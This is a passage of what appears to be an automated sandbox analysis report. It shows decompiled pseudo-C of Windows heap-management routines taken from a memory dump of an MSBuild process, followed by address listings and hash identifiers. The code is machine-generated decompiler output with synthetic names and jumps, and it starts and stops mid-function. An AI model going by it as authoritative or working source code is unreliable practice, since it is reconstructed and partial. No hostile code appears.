                                            							__eflags = _t366 - 0x7f000;
                                            							if(_t366 >= 0x7f000) {
                                            								_t104 = _t553 + 0x1ec;
                                            								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                            								__eflags =  *_t104;
                                            							}
                                            							__eflags = _v40;
                                            							if(_v40 == 0) {
                                            								_t533 = _v52 + _v44;
                                            								_v32 = _t533;
                                            								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                            								__eflags = _v24 - _v52 + _v44;
                                            								if(_v24 == _v52 + _v44) {
                                            									__eflags =  *(_t553 + 0x4c);
                                            									if( *(_t553 + 0x4c) != 0) {
                                            										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                            										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                            									}
                                            								} else {
                                            									_t449 = 0;
                                            									_t533[3] = 0;
                                            									_t533[1] = 0;
                                            									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                            									_t491 = _t394;
                                            									 *_t533 = _t394;
                                            									__eflags =  *0x10f8748 - 1; // 0x0
                                            									if(__eflags >= 0) {
                                            										__eflags = _t491 - 1;
                                            										if(_t491 <= 1) {
                                            											_t404 =  *[fs:0x30];
                                            											__eflags =  *(_t404 + 0xc);
                                            											if( *(_t404 + 0xc) == 0) {
                                            												_push("HEAP: ");
                                            												E0100B150();
                                            											} else {
                                            												E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            											}
                                            											_push("((LONG)FreeEntry->Size > 1)");
                                            											E0100B150();
                                            											_pop(_t491);
                                            											__eflags =  *0x10f7bc8 - _t449; // 0x0
                                            											if(__eflags == 0) {
                                            												__eflags = 0;
                                            												_t491 = 1;
                                            												E010C2073(_t449, 1, _t541, 0);
                                            											}
                                            											_t533 = _v32;
                                            										}
                                            									}
                                            									_t533[1] = _t449;
                                            									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                            									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                            										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                            										_v16 = _t402;
                                            										__eflags = _t402 - 0xfe;
                                            										if(_t402 >= 0xfe) {
                                            											_push(_t491);
                                            											_push(_t449);
                                            											E010CA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                            											_t533 = _v48;
                                            											_t402 = _v32;
                                            										}
                                            										_t449 = _t402;
                                            									}
                                            									_t533[3] = _t449;
                                            									E0102A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                            									_t447 = 0x7ffe0380;
                                            								}
                                            							}
                                            							_t367 = E01027D50();
                                            							__eflags = _t367;
                                            							if(_t367 != 0) {
                                            								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t370 = _t447;
                                            							}
                                            							__eflags =  *_t370;
                                            							if( *_t370 != 0) {
                                            								_t371 =  *[fs:0x30];
                                            								__eflags =  *(_t371 + 0x240) & 1;
                                            								if(( *(_t371 + 0x240) & 1) != 0) {
                                            									__eflags = E01027D50();
                                            									if(__eflags != 0) {
                                            										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            									}
                                            									E010C1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                            								}
                                            							}
                                            							_t372 = E01027D50();
                                            							_t546 = 0x7ffe038a;
                                            							_t446 = 0x230;
                                            							__eflags = _t372;
                                            							if(_t372 != 0) {
                                            								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            							} else {
                                            								_t246 = 0x7ffe038a;
                                            							}
                                            							__eflags =  *_t246;
                                            							if( *_t246 == 0) {
                                            								goto L7;
                                            							} else {
                                            								__eflags = E01027D50();
                                            								if(__eflags != 0) {
                                            									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                            									__eflags = _t546;
                                            								}
                                            								_push( *_t546 & 0x000000ff);
                                            								_push(_v36);
                                            								_push(_v40);
                                            								goto L120;
                                            							}
                                            						}
                                            					} else {
                                            						L19:
                                            						_t31 = _t513 + 0x101f; // 0x101f
                                            						_t455 = _t31 & 0xfffff000;
                                            						_t32 = _t513 + 0x28; // 0x28
                                            						_v44 = _t455;
                                            						__eflags = _t455 - _t32;
                                            						if(_t455 == _t32) {
                                            							_t455 = _t455 + 0x1000;
                                            							_v44 = _t455;
                                            						}
                                            						_t265 = _t445 << 3;
                                            						_v24 = _t265;
                                            						_t266 = _t265 + _t513;
                                            						__eflags = _v40;
                                            						_v20 = _t266;
                                            						if(_v40 == 0) {
                                            							_t266 = _t266 + 0xfffffff0;
                                            							__eflags = _t266;
                                            						}
                                            						_t267 = _t266 & 0xfffff000;
                                            						_v52 = _t267;
                                            						__eflags = _t267 - _t455;
                                            						if(_t267 < _t455) {
                                            							__eflags =  *0x10f8748 - 1; // 0x0
                                            							if(__eflags < 0) {
                                            								L9:
                                            								_t450 = _t553;
                                            								L10:
                                            								_push(_t445);
                                            								goto L11;
                                            							}
                                            							__eflags = _v40;
                                            							L146:
                                            							if(__eflags == 0) {
                                            								goto L9;
                                            							}
                                            							_t270 =  *[fs:0x30];
                                            							__eflags =  *(_t270 + 0xc);
                                            							if( *(_t270 + 0xc) == 0) {
                                            								_push("HEAP: ");
                                            								E0100B150();
                                            							} else {
                                            								E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            							}
                                            							_push("(!TrailingUCR)");
                                            							E0100B150();
                                            							__eflags =  *0x10f7bc8;
                                            							if( *0x10f7bc8 == 0) {
                                            								__eflags = 0;
                                            								E010C2073(_t445, 1, _t541, 0);
                                            							}
                                            							L152:
                                            							_t445 = _a4;
                                            							L153:
                                            							_t513 = _v48;
                                            							goto L9;
                                            						}
                                            						_v32 = _t267;
                                            						_t280 = _t267 - _t455;
                                            						_v32 = _v32 - _t455;
                                            						__eflags = _a8;
                                            						_t460 = _v32;
                                            						_v52 = _t460;
                                            						if(_a8 != 0) {
                                            							L27:
                                            							__eflags = _t280;
                                            							if(_t280 == 0) {
                                            								L33:
                                            								_t446 = 0;
                                            								__eflags = _v40;
                                            								if(_v40 == 0) {
                                            									_t468 = _v44 + _v52;
                                            									_v36 = _t468;
                                            									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                            									__eflags = _v20 - _v52 + _v44;
                                            									if(_v20 == _v52 + _v44) {
                                            										__eflags =  *(_t553 + 0x4c);
                                            										if( *(_t553 + 0x4c) != 0) {
                                            											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                            											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                            										}
                                            									} else {
                                            										_t468[3] = 0;
                                            										_t468[1] = 0;
                                            										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                            										_t521 = _t317;
                                            										 *_t468 = _t317;
                                            										__eflags =  *0x10f8748 - 1; // 0x0
                                            										if(__eflags >= 0) {
                                            											__eflags = _t521 - 1;
                                            											if(_t521 <= 1) {
                                            												_t327 =  *[fs:0x30];
                                            												__eflags =  *(_t327 + 0xc);
                                            												if( *(_t327 + 0xc) == 0) {
                                            													_push("HEAP: ");
                                            													E0100B150();
                                            												} else {
                                            													E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            												}
                                            												_push("(LONG)FreeEntry->Size > 1");
                                            												E0100B150();
                                            												__eflags =  *0x10f7bc8 - _t446; // 0x0
                                            												if(__eflags == 0) {
                                            													__eflags = 1;
                                            													E010C2073(_t446, 1, _t541, 1);
                                            												}
                                            												_t468 = _v36;
                                            											}
                                            										}
                                            										_t468[1] = _t446;
                                            										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                            										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                            										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                            											_t320 = _t446;
                                            										} else {
                                            											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                            											_v12 = _t320;
                                            											__eflags = _t320 - 0xfe;
                                            											if(_t320 >= 0xfe) {
                                            												_push(_t468);
                                            												_push(_t446);
                                            												E010CA80D(_t522, 3, _t468, _t541);
                                            												_t468 = _v52;
                                            												_t320 = _v28;
                                            											}
                                            										}
                                            										_t468[3] = _t320;
                                            										E0102A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                            									}
                                            								}
                                            								E0102B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                            								E0102A830(_t553, _v64, _v24);
                                            								_t286 = E01027D50();
                                            								_t542 = 0x7ffe0380;
                                            								__eflags = _t286;
                                            								if(_t286 != 0) {
                                            									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            								} else {
                                            									_t289 = 0x7ffe0380;
                                            								}
                                            								__eflags =  *_t289;
                                            								if( *_t289 != 0) {
                                            									_t290 =  *[fs:0x30];
                                            									__eflags =  *(_t290 + 0x240) & 1;
                                            									if(( *(_t290 + 0x240) & 1) != 0) {
                                            										__eflags = E01027D50();
                                            										if(__eflags != 0) {
                                            											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            										}
                                            										E010C1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                            									}
                                            								}
                                            								_t291 = E01027D50();
                                            								_t543 = 0x7ffe038a;
                                            								__eflags = _t291;
                                            								if(_t291 != 0) {
                                            									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            								} else {
                                            									_t246 = 0x7ffe038a;
                                            								}
                                            								__eflags =  *_t246;
                                            								if( *_t246 != 0) {
                                            									__eflags = E01027D50();
                                            									if(__eflags != 0) {
                                            										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                            										__eflags = _t543;
                                            									}
                                            									_push( *_t543 & 0x000000ff);
                                            									_push(_t446);
                                            									_push(_t446);
                                            									L120:
                                            									_push( *(_t553 + 0x74) << 3);
                                            									_push(_v52);
                                            									_t246 = E010C1411(_t446, _t553, _v44, __eflags);
                                            								}
                                            								goto L7;
                                            							}
                                            							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                            							_t339 = E0103174B( &_v44,  &_v52, 0x4000);
                                            							__eflags = _t339;
                                            							if(_t339 < 0) {
                                            								L94:
                                            								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                            								__eflags = _v40;
                                            								if(_v40 == 0) {
                                            									goto L153;
                                            								}
                                            								E0102B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                            								goto L152;
                                            							}
                                            							_t344 = E01027D50();
                                            							__eflags = _t344;
                                            							if(_t344 != 0) {
                                            								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                            							} else {
                                            								_t347 = 0x7ffe0380;
                                            							}
                                            							__eflags =  *_t347;
                                            							if( *_t347 != 0) {
                                            								_t348 =  *[fs:0x30];
                                            								__eflags =  *(_t348 + 0x240) & 1;
                                            								if(( *(_t348 + 0x240) & 1) != 0) {
                                            									E010C14FB(_t445, _t553, _v44, _v52, 6);
                                            								}
                                            							}
                                            							_t513 = _v48;
                                            							goto L33;
                                            						}
                                            						__eflags =  *_v12 - 3;
                                            						_t513 = _v48;
                                            						if( *_v12 == 3) {
                                            							goto L27;
                                            						}
                                            						__eflags = _t460;
                                            						if(_t460 == 0) {
                                            							goto L9;
                                            						}
                                            						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                            						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                            							goto L9;
                                            						}
                                            						goto L27;
                                            					}
                                            				}
                                            				_t445 = _a4;
                                            				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                            					_t513 = __edx;
                                            					goto L10;
                                            				}
                                            				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                            				_v20 = _t433;
                                            				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                            					_t513 = _t539;
                                            					goto L9;
                                            				} else {
                                            					_t437 = E010299BF(__ecx, __edx,  &_a4, 0);
                                            					_t445 = _a4;
                                            					_t514 = _t437;
                                            					_v56 = _t514;
                                            					if(_t445 - 0x201 > 0xfbff) {
                                            						goto L14;
                                            					} else {
                                            						E0102A830(__ecx, _t514, _t445);
                                            						_t506 =  *(_t553 + 0x238);
                                            						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                            						_t246 = _t506 >> 4;
                                            						if(_t551 < _t506 - _t246) {
                                            							_t508 =  *(_t553 + 0x23c);
                                            							_t246 = _t508 >> 2;
                                            							__eflags = _t551 - _t508 - _t246;
                                            							if(_t551 > _t508 - _t246) {
                                            								_t246 = E0103ABD8(_t553);
                                            								 *(_t553 + 0x23c) = _t551;
                                            								 *(_t553 + 0x238) = _t551;
                                            							}
                                            						}
                                            						goto L7;
                                            					}
                                            				}
                                            			}



















































































                                            0x0102a309
                                            0x0102a316
                                            0x0102a319
                                            0x0102a31d
                                            0x0102a32d
                                            0x0102a331
                                            0x01071e0d
                                            0x01071e10
                                            0x0102a3cb
                                            0x0102a3cb
                                            0x0102a3bd
                                            0x0102a3c3
                                            0x0102a3c3
                                            0x0102a33a
                                            0x01071e17
                                            0x01071e1b
                                            0x01071e1d
                                            0x01071e2f
                                            0x01071e34
                                            0x01071e36
                                            0x01071e3c
                                            0x01071e3c
                                            0x01071e3c
                                            0x01071e3c
                                            0x01071e36
                                            0x01071e42
                                            0x01071e45
                                            0x01071e47
                                            0x0102a3f8
                                            0x0102a3f8
                                            0x0102a3fb
                                            0x0102a3fd
                                            0x01071e50
                                            0x0102a403
                                            0x0102a411
                                            0x0102a411
                                            0x0102a411
                                            0x0102a41e
                                            0x0102a420
                                            0x0102a424
                                            0x0102a427
                                            0x0102a7c9
                                            0x0102a7cd
                                            0x0102a7d2
                                            0x0102a7d9
                                            0x0102a7e0
                                            0x0102a7e3
                                            0x0102a7ed
                                            0x0102a7f3
                                            0x0102a7f9
                                            0x0102a7ff
                                            0x0102a802
                                            0x0102a807
                                            0x0102a809
                                            0x0102a809
                                            0x0102a809
                                            0x0102a80f
                                            0x0102a80f
                                            0x0102a812
                                            0x0102a81c
                                            0x0102a821
                                            0x0102a824
                                            0x0102a42d
                                            0x0102a42d
                                            0x0102a42d
                                            0x0102a42d
                                            0x0102a42d
                                            0x0102a436
                                            0x0102a43a
                                            0x0102a609
                                            0x0102a60d
                                            0x0102a612
                                            0x0102a616
                                            0x0102a61a
                                            0x01071e57
                                            0x01071e59
                                            0x00000000
                                            0x00000000
                                            0x01071e5f
                                            0x0102a620
                                            0x0102a627
                                            0x01071e64
                                            0x01071e66
                                            0x01071e6c
                                            0x01071e72
                                            0x01071e76
                                            0x01071e95
                                            0x01071e9a
                                            0x01071e78
                                            0x01071e8d
                                            0x01071e92
                                            0x01071ea0
                                            0x01071ea5
                                            0x01071eaa
                                            0x01071eb2
                                            0x01071eb6
                                            0x01071eb9
                                            0x01071eb9
                                            0x01071ebe
                                            0x01071ec2
                                            0x01071ec2
                                            0x01071e66
                                            0x0102a62d
                                            0x0102a633
                                            0x0102a636
                                            0x0102a63a
                                            0x0102a63c
                                            0x0102a640
                                            0x0102a642
                                            0x0102a644
                                            0x0102a644
                                            0x0102a644
                                            0x0102a64d
                                            0x0102a64d
                                            0x0102a651
                                            0x0102a655
                                            0x01071eca
                                            0x01071ed1
                                            0x00000000
                                            0x00000000
                                            0x01071ed7
                                            0x00000000
                                            0x0102a65b
                                            0x0102a669
                                            0x0102a66e
                                            0x0102a670
                                            0x00000000
                                            0x00000000
                                            0x0102a676
                                            0x0102a67b
                                            0x0102a680
                                            0x0102a682
                                            0x01071f1a
                                            0x0102a688
                                            0x0102a688
                                            0x0102a688
                                            0x0102a68a
                                            0x0102a68d
                                            0x01071f24
                                            0x01071f2a
                                            0x01071f31
                                            0x01071f43
                                            0x01071f43
                                            0x01071f31
                                            0x0102a693
                                            0x0102a697
                                            0x0102a69d
                                            0x0102a6a0
                                            0x0102a6a6
                                            0x0102a6a8
                                            0x0102a6a8
                                            0x0102a6a8
                                            0x0102a6a8
                                            0x0102a6b2
                                            0x0102a6b7
                                            0x0102a6c1
                                            0x0102a6c6
                                            0x0102a6d2
                                            0x0102a6d9
                                            0x0102a6e3
                                            0x0102a6e6
                                            0x0102a6eb
                                            0x0102a6ed
                                            0x0102a6ed
                                            0x0102a6ed
                                            0x0102a6ed
                                            0x0102a6f3
                                            0x0102a6f8
                                            0x0102a702
                                            0x0102a70a
                                            0x0102a70e
                                            0x0102a71a
                                            0x0102a71e
                                            0x01071fcb
                                            0x01071fcf
                                            0x01071fdd
                                            0x01071fe3
                                            0x01071fe3
                                            0x0102a724
                                            0x0102a728
                                            0x0102a72a
                                            0x0102a72d
                                            0x0102a737
                                            0x0102a73a
                                            0x0102a73c
                                            0x0102a742
                                            0x0102a748
                                            0x01071f4d
                                            0x01071f50
                                            0x01071f56
                                            0x01071f5c
                                            0x01071f5f
                                            0x01071f7e
                                            0x01071f83
                                            0x01071f61
                                            0x01071f76
                                            0x01071f7b
                                            0x01071f89
                                            0x01071f8e
                                            0x01071f93
                                            0x01071f94
                                            0x01071f9a
                                            0x01071f9c
                                            0x01071f9e
                                            0x01071fa1
                                            0x01071fa1
                                            0x01071fa6
                                            0x01071fa6
                                            0x01071f50
                                            0x0102a74e
                                            0x0102a751
                                            0x0102a754
                                            0x0102a75d
                                            0x0102a75e
                                            0x0102a762
                                            0x0102a767
                                            0x01071faf
                                            0x01071fb0
                                            0x01071fb9
                                            0x01071fbe
                                            0x01071fc2
                                            0x01071fc2
                                            0x0102a76d
                                            0x0102a76d
                                            0x0102a775
                                            0x0102a778
                                            0x0102a77d
                                            0x0102a77d
                                            0x0102a71e
                                            0x0102a782
                                            0x0102a787
                                            0x0102a789
                                            0x01071ff3
                                            0x0102a78f
                                            0x0102a78f
                                            0x0102a78f
                                            0x0102a791
                                            0x0102a794
                                            0x01071ffd
                                            0x01072006
                                            0x0107200c
                                            0x01072017
                                            0x01072019
                                            0x01072024
                                            0x01072024
                                            0x01072024
                                            0x01072047
                                            0x01072047
                                            0x0107200c
                                            0x0102a79a
                                            0x0102a79f
                                            0x0102a7a4
                                            0x0102a7a9
                                            0x0102a7ab
                                            0x0107205a
                                            0x0102a7b1
                                            0x0102a7b1
                                            0x0102a7b1
                                            0x0102a7b3
                                            0x0102a7b6
                                            0x00000000
                                            0x0102a7bc
                                            0x01072066
                                            0x01072068
                                            0x01072073
                                            0x01072073
                                            0x01072073
                                            0x01072078
                                            0x01072079
                                            0x0107207d
                                            0x00000000
                                            0x0107207d
                                            0x0102a7b6
                                            0x0102a440
                                            0x0102a440
                                            0x0102a440
                                            0x0102a446
                                            0x0102a44c
                                            0x0102a44f
                                            0x0102a453
                                            0x0102a455
                                            0x010720b3
                                            0x010720b9
                                            0x010720b9
                                            0x0102a45d
                                            0x0102a460
                                            0x0102a464
                                            0x0102a466
                                            0x0102a46b
                                            0x0102a46f
                                            0x0102a471
                                            0x0102a471
                                            0x0102a471
                                            0x0102a474
                                            0x0102a479
                                            0x0102a47d
                                            0x0102a47f
                                            0x01072229
                                            0x0107222f
                                            0x0102a3c8
                                            0x0102a3c8
                                            0x0102a3ca
                                            0x0102a3ca
                                            0x00000000
                                            0x0102a3ca
                                            0x01072235
                                            0x0107223a
                                            0x0107223a
                                            0x00000000
                                            0x00000000
                                            0x01072240
                                            0x01072246
                                            0x0107224a
                                            0x01072269
                                            0x0107226e
                                            0x0107224c
                                            0x01072261
                                            0x01072266
                                            0x01072274
                                            0x01072279
                                            0x0107227e
                                            0x01072286
                                            0x01072288
                                            0x0107228d
                                            0x0107228d
                                            0x01072292
                                            0x01072292
                                            0x01072295
                                            0x01072295
                                            0x00000000
                                            0x01072295
                                            0x0102a485
                                            0x0102a489
                                            0x0102a48b
                                            0x0102a48f
                                            0x0102a493
                                            0x0102a497
                                            0x0102a49b
                                            0x0102a4bb
                                            0x0102a4bb
                                            0x0102a4bd
                                            0x0102a4ff
                                            0x0102a4ff
                                            0x0102a501
                                            0x0102a505
                                            0x0102a50f
                                            0x0102a517
                                            0x0102a51b
                                            0x0102a527
                                            0x0102a52b
                                            0x01072182
                                            0x01072185
                                            0x01072193
                                            0x01072199
                                            0x01072199
                                            0x0102a531
                                            0x0102a535
                                            0x0102a538
                                            0x0102a548
                                            0x0102a54b
                                            0x0102a54d
                                            0x0102a553
                                            0x0102a559
                                            0x01072100
                                            0x01072103
                                            0x01072109
                                            0x0107210f
                                            0x01072112
                                            0x01072131
                                            0x01072136
                                            0x01072114
                                            0x01072129
                                            0x0107212e
                                            0x0107213c
                                            0x01072141
                                            0x01072147
                                            0x0107214d
                                            0x01072151
                                            0x01072154
                                            0x01072154
                                            0x01072159
                                            0x01072159
                                            0x01072103
                                            0x0102a55f
                                            0x0102a562
                                            0x0102a565
                                            0x0102a567
                                            0x01072162
                                            0x0102a56d
                                            0x0102a574
                                            0x0102a575
                                            0x0102a579
                                            0x0102a57e
                                            0x01072169
                                            0x0107216a
                                            0x01072170
                                            0x01072175
                                            0x01072179
                                            0x01072179
                                            0x0102a57e
                                            0x0102a584
                                            0x0102a58f
                                            0x0102a58f
                                            0x0102a52b
                                            0x0102a5ad
                                            0x0102a5bc
                                            0x0102a5c1
                                            0x0102a5c6
                                            0x0102a5cb
                                            0x0102a5cd
                                            0x010721a9
                                            0x0102a5d3
                                            0x0102a5d3
                                            0x0102a5d3
                                            0x0102a5d5
                                            0x0102a5d8
                                            0x010721b3
                                            0x010721bc
                                            0x010721c2
                                            0x010721cd
                                            0x010721cf
                                            0x010721da
                                            0x010721da
                                            0x010721da
                                            0x010721f7
                                            0x010721f7
                                            0x010721c2
                                            0x0102a5de
                                            0x0102a5e3
                                            0x0102a5e8
                                            0x0102a5ea
                                            0x0107220a
                                            0x0102a5f0
                                            0x0102a5f0
                                            0x0102a5f0
                                            0x0102a5f2
                                            0x0102a5f5
                                            0x01072219
                                            0x0107221b
                                            0x0107208c
                                            0x0107208c
                                            0x0107208c
                                            0x01072095
                                            0x01072096
                                            0x01072097
                                            0x01072098
                                            0x010720a4
                                            0x010720a5
                                            0x010720a9
                                            0x010720a9
                                            0x00000000
                                            0x0102a5f5
                                            0x0102a4bf
                                            0x0102a4d3
                                            0x0102a4d8
                                            0x0102a4da
                                            0x01071ede
                                            0x01071ede
                                            0x01071ee4
                                            0x01071ee9
                                            0x00000000
                                            0x00000000
                                            0x01071f07
                                            0x00000000
                                            0x01071f07
                                            0x0102a4e0
                                            0x0102a4e5
                                            0x0102a4e7
                                            0x010720cb
                                            0x0102a4ed
                                            0x0102a4ed
                                            0x0102a4ed
                                            0x0102a4f2
                                            0x0102a4f5
                                            0x010720d5
                                            0x010720de
                                            0x010720e4
                                            0x010720f6
                                            0x010720f6
                                            0x010720e4
                                            0x0102a4fb
                                            0x00000000
                                            0x0102a4fb
                                            0x0102a4a1
                                            0x0102a4a4
                                            0x0102a4a8
                                            0x00000000
                                            0x00000000
                                            0x0102a4aa
                                            0x0102a4ac
                                            0x00000000
                                            0x00000000
                                            0x0102a4b2
                                            0x0102a4b5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102a4b5
                                            0x0102a43a
                                            0x0102a340
                                            0x0102a346
                                            0x0102a600
                                            0x00000000
                                            0x0102a600
                                            0x0102a34f
                                            0x0102a351
                                            0x0102a358
                                            0x0102a3c6
                                            0x00000000
                                            0x0102a371
                                            0x0102a37a
                                            0x0102a37f
                                            0x0102a382
                                            0x0102a384
                                            0x0102a394
                                            0x00000000
                                            0x0102a396
                                            0x0102a399
                                            0x0102a3a7
                                            0x0102a3b0
                                            0x0102a3b4
                                            0x0102a3bb
                                            0x0102a3d2
                                            0x0102a3da
                                            0x0102a3df
                                            0x0102a3e1
                                            0x0102a3e5
                                            0x0102a3ea
                                            0x0102a3f0
                                            0x0102a3f0
                                            0x0102a3e1
                                            0x00000000
                                            0x0102a3bb
                                            0x0102a394

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-523794902
                                            • Opcode ID: 4972dec88897be74928d57953f036d0f61e9780bde5f23848ceb824b32b425bb
                                            • Instruction ID: 4b64b678835ec9a99c2186d2f2375bc5e23b6cb1dff2fa22b5762dc249ed6804
                                            • Opcode Fuzzy Hash: 4972dec88897be74928d57953f036d0f61e9780bde5f23848ceb824b32b425bb
                                            • Instruction Fuzzy Hash: 7342DE30A04781DFD715CF28C884B6ABBE5BF98604F0489ADF5C68B792DB34D981CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 64%
                                            			E010C2D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed int _t83;
                                            				signed char _t89;
                                            				intOrPtr _t90;
                                            				signed char _t101;
                                            				signed int _t102;
                                            				intOrPtr _t104;
                                            				signed int _t105;
                                            				signed int _t106;
                                            				intOrPtr _t108;
                                            				intOrPtr _t112;
                                            				short* _t130;
                                            				short _t131;
                                            				signed int _t148;
                                            				intOrPtr _t149;
                                            				signed int* _t154;
                                            				short* _t165;
                                            				signed int _t171;
                                            				void* _t182;
                                            
                                            				_push(0x44);
                                            				_push(0x10e0e80);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				_t177 = __edx;
                                            				_t181 = __ecx;
                                            				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                            				 *((char*)(_t182 - 0x1d)) = 0;
                                            				 *(_t182 - 0x24) = 0;
                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                            					 *((intOrPtr*)(_t182 - 4)) = 0;
                                            					 *((intOrPtr*)(_t182 - 4)) = 1;
                                            					_t83 = E010040E1("RtlAllocateHeap");
                                            					__eflags = _t83;
                                            					if(_t83 == 0) {
                                            						L48:
                                            						 *(_t182 - 0x24) = 0;
                                            						L49:
                                            						 *((intOrPtr*)(_t182 - 4)) = 0;
                                            						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                            						E010C30C4();
                                            						goto L50;
                                            					}
                                            					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                            					 *(_t182 - 0x28) = _t89;
                                            					 *(_t182 - 0x3c) = _t89;
                                            					_t177 =  *(_t182 + 8);
                                            					__eflags = _t177;
                                            					if(_t177 == 0) {
                                            						_t171 = 1;
                                            						__eflags = 1;
                                            					} else {
                                            						_t171 = _t177;
                                            					}
                                            					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                            					__eflags = _t148 - 0x10;
                                            					if(_t148 < 0x10) {
                                            						_t148 = 0x10;
                                            					}
                                            					_t149 = _t148 + 8;
                                            					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                            					__eflags = _t149 - _t177;
                                            					if(_t149 < _t177) {
                                            						L44:
                                            						_t90 =  *[fs:0x30];
                                            						__eflags =  *(_t90 + 0xc);
                                            						if( *(_t90 + 0xc) == 0) {
                                            							_push("HEAP: ");
                                            							E0100B150();
                                            						} else {
                                            							E0100B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            						}
                                            						_push( *((intOrPtr*)(_t181 + 0x78)));
                                            						E0100B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                            						goto L48;
                                            					} else {
                                            						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                            						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                            							goto L44;
                                            						}
                                            						__eflags = _t89 & 0x00000001;
                                            						if((_t89 & 0x00000001) != 0) {
                                            							_t178 =  *(_t182 - 0x28);
                                            						} else {
                                            							E0101EEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                            							 *((char*)(_t182 - 0x1d)) = 1;
                                            							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                            							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                            						}
                                            						E010C4496(_t181, 0);
                                            						_t177 = L01024620(_t181, _t181, _t178,  *(_t182 + 8));
                                            						 *(_t182 - 0x24) = _t177;
                                            						_t173 = 1;
                                            						E010C49A4(_t181);
                                            						__eflags = _t177;
                                            						if(_t177 == 0) {
                                            							goto L49;
                                            						} else {
                                            							_t177 = _t177 + 0xfffffff8;
                                            							__eflags =  *((char*)(_t177 + 7)) - 5;
                                            							if( *((char*)(_t177 + 7)) == 5) {
